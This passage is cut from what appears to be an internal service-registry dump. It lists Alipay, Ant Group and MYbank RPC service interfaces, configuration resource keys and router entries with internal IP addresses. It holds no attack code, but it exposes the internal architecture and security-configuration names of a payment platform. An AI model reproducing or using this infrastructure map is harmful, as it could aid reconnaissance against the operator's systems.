Impl.maxBuyAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finrtcalcenter.common.service.facade.dfinsight.analyse.TraitSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xssClientPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mquery.common.service.facade.report.RecvPayReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetprod.common.facade.AssetProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.igdmc.biz.service.LocalDataBloodRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_EC_fundFixedInvestmentSign_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.datafin.biz.share.tenant.TenantConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.bkgwlite.common.service.facade.api.TransSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RelationRiskTaskManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.65.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:acmantyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.StarstageUserFormFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.SettleRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.admin.AdminPlatformAppFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeapRefundOrderQueryFacade:1.0:tradequeryhis@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.common.service.facade.ReserveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.StagedFreezeService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.drillcenter.facade.api.CollectDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.forest.EnergyBubbleQueryService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcshield.common.service.facade.sceneconstruction.WhitelistTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:amlcloud@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.DiscountMonitorLogQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.216.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ibops.common.service.facade.query.CampaignWinInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbcscenter.facade.KbDataSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_MQ_ZPROXY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifemng.facade.ccr.ImportRefundFileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.insmobile.insmobileConfDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.52.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcloanrepay.common.service.facade.service.support.ArrangementBlacklistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.kbscore.api.ShopScoreDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoaftermarket.common.service.common.AutoAfterBizConfigFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.combmng.common.service.facade.user.ViewEntUserAccountBankService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdl.digital.logistic.business.rpc.DLBusinessOpRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.operate.openapi.client.ConsumeOperationInvokeService:1.0:storePayAssistanInvokeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketmng.common.service.facade.api.manage.ApiGroupFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.reading.common.service.facade.game.open.DadaOpenSpecialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.inner.SendRemarkRzService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.feedback.facade.FeedbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.biz.shared.resource.TaskTransferResource.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.meta2:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.common.service.facade.VirtualPhoneCallRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.AppLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_adtask_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.custview.antg.facade.customer.AntInvolvedPartyViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.manager.facade.PublicitySpecialTreatmentAuditRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.180.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.ctuevent.CtuEventDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.168.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.simulated.api.SatransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:gzmshmp-mockweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinstockprod.biz.service.gw.asset.api.AssetsAnalysisService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.task.StockUserOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.service.AssetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.ShopSubscribeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.DeviceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.prodmng:name=com.alipay.zcache.tbase.prodcoreTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.redeem.AssetRedeemApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.invoicecommercial.facade.api.ServiceAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.levelzero.api.LztransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.DataProxyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.operation.ActivityOperationRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.table.TableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.spi.ControlBizFacade:1.0:benefitControlBizFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetinsight.common.service.facade.api.DeliveryProductInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.view.dayu.service.AppAggregateQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightcore.common.service.facade.rec.api.RecServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_DWDSPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.progov.service.api.asbi.AsbiBizVisualizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.68.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkkycprod.common.service.facade.trust.questionaire.service.DualRecordQuestionaireQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers__NOTIFYEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_FP_CHAT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zqualitydatacore.common.service.facade.MarketAccountPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.qc.QcCheckDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.4.203#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcloanlend.common.service.facade.api.cmd.CmdExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileapp.common.integration.masterdata.ThinQueryServiceFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqa.facade.discount.CampaignCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.InspectSubtaskResultDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.biz.gw.service.multilogin.MultiLoginManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:riskmerchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.UserProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepbuss.common.facade.CashQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainassetreg.facade.api.issue.DcrgAssetIssueService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:alertExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dsoc.service.facade.api.server.config.ServerConfigService:1.0:${dsoc_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fraudmng:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.randomRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_FINSLIP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.link.facade.DynamicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.64.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.financeprod.fund.facade.api.AutoDepositContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.storeValidateDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.airbops.service.common.proxy.cif.facade.ProxyUserFreezeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.boot.sofarouter.common.client.facade.SofaRouterGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.106.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.biz.shared.match.repository.impl.MatchProductDeltaHourDataStatModelRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.selectProductType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ialicore:name=com.ipay.ialicore.common.drm.ZoneRuleDrm.tairBlackAppList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditdmp.facade.PcdmpCollectDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:yebplus_workOrderCreateCallbackServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IZoneForwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.viewMetaMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:xdev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.event.EventSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.bagrepiece.facade.BagRePieceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.dpchangeguardian.common.facade.api.ProductApi:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.biz.shared.ITableRelationManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.starWishManualBreakFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:appstore_GRZONE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:STD_CREDIT_ADVANCE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.shared.component.asynexecutor.manager.AsynExecutorBSFacade:1.0:bkpromoguard-asynExecutorBSFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.BillQueryBankConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finfundprod.common.service.facade.FcProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.planzero.rockcodecore.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pricemng.common.service.facade.api.price.PricemngRateConversionViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlsmicrogw.common.service.facade.gateway.api.SystemSelfCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:SYJ_ProductAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.PermissionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.38.53.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.45.152.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.NoticeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.AntispamSecCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.test.facade.FintradecenterTradeTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_OPC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchiscore.common.service.facade.generalorder.OrderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.query.KbWorkOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.biz.applet.service.AppletCheck:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.biz.censor.businessrule.BusinessRuleManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.process.common.service.facade.ProcessInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.chair-script:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.cloud.osp.instance.facade.InstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.172.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.139.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.astaralarm.common.service.facade.MngManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.paymentmng.core.cache.drm.FunctionControlDRMControl.paymentmngEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.zdal.ldc.tair.customerTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.203.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.atd:name=com.alipay.cif.drm.BizCertifyRuleGreySwitch.paramCenterUidRangeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:contentEcologyCheckService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cryptprod.common.service.facade.EncryptFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:dcepprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.LogStrategy.useNewChecker,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.146.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linke.aci.core.facade.SLSService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundcore.file.service.facade.FinFundQuickTransferApplyFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.MYBKL2AccountManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:asttshipcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.dfriskmng.facade.DxCompileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.PackageModifySyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1213_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ssprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:bkinstassetassign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_support_miniJumpQueryGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepmng.common.antirack.facade.api.InComingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.component.AggComponentMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adexchange.useraction.AdUserActionFacade:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.common.CompatibleServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finassetcore.common.service.profitcore.facade.CommonAssetProfitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.promo.MerchantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.FixedDataSyncDrmImpl.needSyncScenePercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:antcloud_nomo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acspcore.common.service.business.BusinessStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:personalmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:securitydatastudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.AntHotSearchWordsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofademo.tcc.SecondTccAction:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.NotifyCheckResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.grayprod.change.drm.ChangePolicy.phaseExecutePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.zoloz.zhub.facade.service.SolutionIdentityFacade:1.0:zhubglobal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:habaselineOpsChangeEventListener@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.portrait.TagTriggerConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:securityexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.recon.common.service.facade.api.RegisterBankAccountInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.common.facade.api.AccorderExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.eventconfig.api.EventConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepayprod.common.service.facade.service.repay.LoanAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocontent.common.service.facade.recall.ContentRecallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuntu.biz.trace.service.AutoTestPlatformService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.toutiaooMediaLevelHigh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icfmng.common.service.facade.api.AccountLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.rec.service.PcreditUnionPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.keplerfeature:name=com.alipay.vega.integration.kepler.drm.EventDrm.content,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.almcenter.service.facade.api.activity.BlackListManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.common.service.integration.config.ServiceClientConfigResource.decisionCallSystemBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:zimtmsvcprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.limitcenter.service.facade.accumulate.api.QueryLimitAccumulateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.integration.ebppgw.InvoiceCheckClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:operator-DCDataSyncFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mindv.okcourse.service.OkAdvertMoblieService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincontract.common.service.facade.FileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.